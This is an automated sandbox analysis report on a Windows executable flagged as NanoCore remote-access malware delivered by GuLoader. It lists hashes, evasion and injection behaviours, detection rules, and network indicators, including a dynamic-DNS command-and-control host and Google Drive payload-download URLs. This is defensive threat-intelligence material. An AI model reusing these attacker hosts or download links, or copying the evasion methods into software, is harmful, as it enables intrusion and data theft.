Edit tour

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Analysis ID:	736731
MD5:	5f570885a22cf0a74ca454ea710bcd2e
SHA1:	82e8aa91a64dd2e0f1c18317518e9e2914387967
SHA256:	a1dbe6c38c03059bd197cde9e455e03875c32dd034cc6c229c4c62b2d1753eaf
Infos:

Detection

NanoCore, GuLoader

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: NanoCore

Yara detected GuLoader

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Uses 32bit PE files

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe (PID: 6320 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe MD5: 5F570885A22CF0A74CA454EA710BCD2E)

CasPol.exe (PID: 2752 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000A.00000000.29011621997.0000000001100000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe PID: 6320	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Sigma Signatures

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, ProcessId: 2752, TargetFilename: C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.11.20:49841 version: TLS 1.2

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_004065C5 FindFirstFileW,FindClose,	1_2_004065C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_00402862 FindFirstFileW,	1_2_00402862

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: mastersure042.duckdns.org

Source: Joe Sandbox View

ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-90-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49842 -> 91.193.75.140:4235

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000000A.00000003.29241458764.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29236851194.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29542583140.00000000014E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetupHelper.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: CasPol.exe, 0000000A.00000003.29542547284.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29236851194.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29241414846.00000000014E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SetupHelper.exe.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-10-90-docs.googleusercontent.com/
Source: CasPol.exe, 0000000A.00000003.29241626102.00000000014F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-10-90-docs.googleusercontent.com/7
Source: CasPol.exe, 0000000A.00000003.29242029782.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29237253452.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29542976844.000000000151E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.29541952931.000000000149C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-10-90-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8d

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/oiimdd8du3ehjl7ongfpjedkiiajf5ov/1667456475000/09123801443977292633/*/1_u2m0ryRyXxEJKO276_QNcvyYqXQAqSr?e=download&uuid=caf5e569-6740-43bd-97a5-42b5521fedc0 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-90-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.11.20:49841 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_00405425

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_00403373

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_00404C62	1_2_00404C62
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_00406ADD	1_2_00406ADD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_004072B4	1_2_004072B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B8002E	1_2_02B8002E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B81AA8	1_2_02B81AA8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B61695	1_2_02B61695
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B602FC	1_2_02B602FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B65EC9	1_2_02B65EC9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6023B	1_2_02B6023B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60601	1_2_02B60601
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6060E	1_2_02B6060E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6020B	1_2_02B6020B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6026C	1_2_02B6026C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B65E4D	1_2_02B65E4D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B657B1	1_2_02B657B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60BAE	1_2_02B60BAE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B66F95	1_2_02B66F95
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B603F6	1_2_02B603F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60BD4	1_2_02B60BD4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B66FC4	1_2_02B66FC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B65B33	1_2_02B65B33
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6731D	1_2_02B6731D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60B73	1_2_02B60B73
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60370	1_2_02B60370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60B7A	1_2_02B60B7A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B66F66	1_2_02B66F66
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B65B6D	1_2_02B65B6D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B66342	1_2_02B66342
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60348	1_2_02B60348
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B82CB9	1_2_02B82CB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60C83	1_2_02B60C83
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6008F	1_2_02B6008F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60489	1_2_02B60489
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60CFB	1_2_02B60CFB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B600D5	1_2_02B600D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B604C0	1_2_02B604C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60CC8	1_2_02B60CC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60001	1_2_02B60001
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B81C0F	1_2_02B81C0F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60472	1_2_02B60472
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60057	1_2_02B60057
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60C50	1_2_02B60C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B65C5D	1_2_02B65C5D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B821BC	1_2_02B821BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B801AC	1_2_02B801AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B73D96	1_2_02B73D96
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60191	1_2_02B60191
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B671E9	1_2_02B671E9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B601DD	1_2_02B601DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B69DC3	1_2_02B69DC3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B829CF	1_2_02B829CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B815C3	1_2_02B815C3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B8052A	1_2_02B8052A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60D2C	1_2_02B60D2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6692C	1_2_02B6692C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B67113	1_2_02B67113
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6011C	1_2_02B6011C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60572	1_2_02B60572
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B6015A	1_2_02B6015A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B66945	1_2_02B66945
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B60542	1_2_02B60542

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B84AFC NtResumeThread,		1_2_02B84AFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B839D6 NtProtectVirtualMemory,		1_2_02B839D6

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Thow.lnk.1.dr

LNK file: ..\Start Menu\Stripteased\Thysanopteron\Rektifikationen\Tetradrachm.Tid

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

1_2_00403373

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

File created: C:\Users\user\AppData\Local\Temp\nsz9E7B.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.troj.evad.winEXE@4/7@23/4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_004020FE CoCreateInstance,

1_2_004020FE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Code function: 1_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

1_2_004046E6

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{87d3a662-fd07-4a8e-827d-d0ddb84eb2a6}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:304:WilStaging_02

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry\Jessie\Sentinels\Behavioural\SetupHelper.exe, type: DROPPED

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.29011621997.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.29264931081.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe PID: 6320, type: MEMORYSTR

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_10002DE0 push eax; ret	1_2_10002E0E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B686D6 pushad ; retf	1_2_02B6870E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe	Code function: 1_2_02B62E06 push ds; ret	1_2_02B62E86
